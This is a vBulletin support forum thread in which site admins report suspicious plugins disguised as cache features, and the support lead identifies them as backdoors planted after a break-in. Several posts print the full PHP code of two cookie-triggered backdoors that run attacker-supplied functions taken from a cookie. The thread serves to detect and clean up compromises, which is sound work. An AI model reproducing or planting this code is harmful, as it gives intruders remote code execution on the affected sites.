Is This a Default Plugin?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • reefland
    Senior Member
    • Sep 2000
    • 1131

    prefix_vb4_cmsanswered_title_rich Is This a Default Plugin?

    vbCMS Global Thread Cache

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    Wondering if this is related to the vbseo security update. I noticed this plugin after upgrading to 4.1.10 but Brian at vbseo says it looks suspicious.
    sigpic
    Nation of Blue - Kentucky Wildcats Sports


    Some CMS Goodness: Add Avatar to Article
  • Loco.M
    Senior Member
    • Mar 2005
    • 4319
    • 3.5.x

    #2
    I'm interested to know as well so it's something I can check on client sites.
    -- Web Developer for hire
    ---Online Marketing Tools and Articles

    Comment

    • reefland
      Senior Member
      • Sep 2000
      • 1131

      #3
      Further discussion at vbseo says it is not a part of the default package and should be removed.
      sigpic
      Nation of Blue - Kentucky Wildcats Sports


      Some CMS Goodness: Add Avatar to Article

      Comment

      • Loco.M
        Senior Member
        • Mar 2005
        • 4319
        • 3.5.x

        #4
        Originally posted by reefland
        Further discussion at vbseo says it is not a part of the default package and should be removed.
        I saw that, I did some google searching and the only info I found was it listed on Arabic sites.
        -- Web Developer for hire
        ---Online Marketing Tools and Articles

        Comment

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73981

          #5
          It should be removed. One thing I've noticed lately is once someone gets into a site, via whatever means, they are more likely to install a backdoor. This looks to be such an occurrence.

          However, vbulletin_collapse is a valid cookie. Usually looks like this: vbulletin_collapse=c_cat134 c_cat115. Tells the system what areas you have collapsed. Since the collapsing is done by CSS and javascript, there is no real need to have this value in PHP or cached in PHP. Most likely they are creating fake cookies and executing code via the $m variable.

          And my previously published checks for compromises will not check for this plugin via Query. I'll update the protocols.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment

          • Loco.M
            Senior Member
            • Mar 2005
            • 4319
            • 3.5.x

            #6
            Thanks for confirming Wayne Luke
            -- Web Developer for hire
            ---Online Marketing Tools and Articles

            Comment

            • reefland
              Senior Member
              • Sep 2000
              • 1131

              #7
              Time to watch the admin log...
              sigpic
              Nation of Blue - Kentucky Wildcats Sports


              Some CMS Goodness: Add Avatar to Article

              Comment

              • Talaturen
                New Member
                • Dec 2005
                • 12
                • 3.8.x

                #8
                Is there any way we can see how this plugin was added?

                Comment

                • Archaic
                  Senior Member
                  • Dec 2002
                  • 145
                  • 3.8.x

                  #9
                  Since it seems people have reported over on vBSEO that it's come back even after fixing that hole....if this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?

                  Originally posted by reefland
                  Time to watch the admin log...
                  The plugin was added on my forums, however when I checked the admin log on plugin.php for the past month or so, I didn't see anything in there I didn't do myself. Not sure it's going to show.
                  Last edited by Archaic; Mon 23 Jan '12, 12:30pm.
                  神出鬼没 - shin shutsu ki botsu

                  Webmaster, Bulbagarden / Bulbapedia

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73981

                    #10
                    Originally posted by Talaturen
                    Is there any way we can see how this plugin was added?
                    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment

                    • MK_1
                      New Member
                      • Mar 2009
                      • 28

                      #11
                      I found a plugin called "vBulletin Templates Cookie Caching":
                      PHP Code:
                      /* vBulletin Templates Cookie Caching */
                      $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
                      Macht mit beim 2-Wheel-Planet Adventskalender:

                      2WP Adventskalender

                      Comment

                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73981

                        #12
                        Originally posted by Archaic
                        If this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?
                        A conclusion like that would only be supported with proof of some sort. Looks like your vBulletin is up to date. Looks like you stayed up to date with patches. Your Admin CP isn't behind .htaccess though.

                        Are all your addons up to date?

                        Do you have anything stored in the searchprefs field of the usertextfield table?
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment

                        • MK_1
                          New Member
                          • Mar 2009
                          • 28

                          #13
                          I found something in the admin log:
                          54131 admin 20:04, 20.01.2012 plugin.php
                          54130 admin 20:04, 20.01.2012 plugin.php update
                          54129 admin 20:04, 20.01.2012 plugin.php add
                          54128 admin 20:04, 20.01.2012 plugin.php
                          The incredible thing is that I really was active in the admincp minutes later... 20:05 I did some template changes...
                          Macht mit beim 2-Wheel-Planet Adventskalender:

                          2WP Adventskalender

                          Comment

                          • Wayne Luke
                            vBulletin Technical Support Lead
                            • Aug 2000
                            • 73981

                            #14
                            Originally posted by MK_1
                            I found a plugin called "vBulletin Templates Cookie Caching":
                            PHP Code:
                            /* vBulletin Templates Cookie Caching */
                            $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 

                            Same as the plugin above but different cookie values.
                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API

                            Comment

                            • DelDrago
                              Member
                              • Nov 2010
                              • 34
                              • 4.2.X

                              #15
                              This "vbCMS Global Thread Cache" has appeared on my site as well.

                              Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
                              Fantasy Writing Forum - Mythic Scribes

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...